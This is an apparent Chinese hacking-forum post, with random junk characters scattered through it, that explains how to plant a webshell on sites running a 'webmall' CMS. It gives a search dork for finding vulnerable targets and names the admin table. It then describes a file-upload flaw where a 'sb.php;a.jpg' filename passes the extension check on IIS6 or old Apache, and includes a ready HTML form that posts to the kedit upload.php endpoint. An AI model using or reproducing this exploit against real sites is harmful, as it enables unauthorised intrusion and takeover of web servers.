关键字:inurl:webmall/detail.php?id# n) a' P5 y; z5 b' {
5 w# {1 E% }, O% G
数据表:pwn_base_admin- c2 _( C& A! f+ P b ~
6 b% q9 A6 b7 d4 {7 o关于拿shell: L0 C2 ]8 g7 {# _6 h g
' g" v( J$ i- X5 s3 _/ I
首先登录后台admin.php5 U/ o: q; |" f8 d( j9 A
* o7 d3 d# O; C) a: m6 L' k4 K看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
4 e% _8 j& u/ [6 `( s/ Y换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg8 i, }6 }8 E$ Q/ h
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的: N, ?/ q2 l" f4 c* {. m4 r) l( Y
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
* d- c: v9 E% L, h<input type="text" name="fileName" value="sb.php;a.jpg" />
; W: F- Q. h7 G0 k<input type="hidden" name="attachPath" value="news/pics/" /> 2 q0 J6 n, E2 g5 B+ H8 k! R" V6 [
<input type="file" name="fileData" size="14" /></td>
4 V9 a- G f) v4 B& ]+ M3 f7 S<input type="submit" name="button" value="确定" />
" @; D" {% f5 `+ [* x- Z+ P</form>6 N2 O8 h9 x) M1 N# j8 [
9 \8 k* n# b0 Q* o, v/ Z$ B# V
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。8 `" V- I, F, `% p8 }7 W1 R
J! ?1 B2 ~1 x0 n1 K, A" i* O- @ |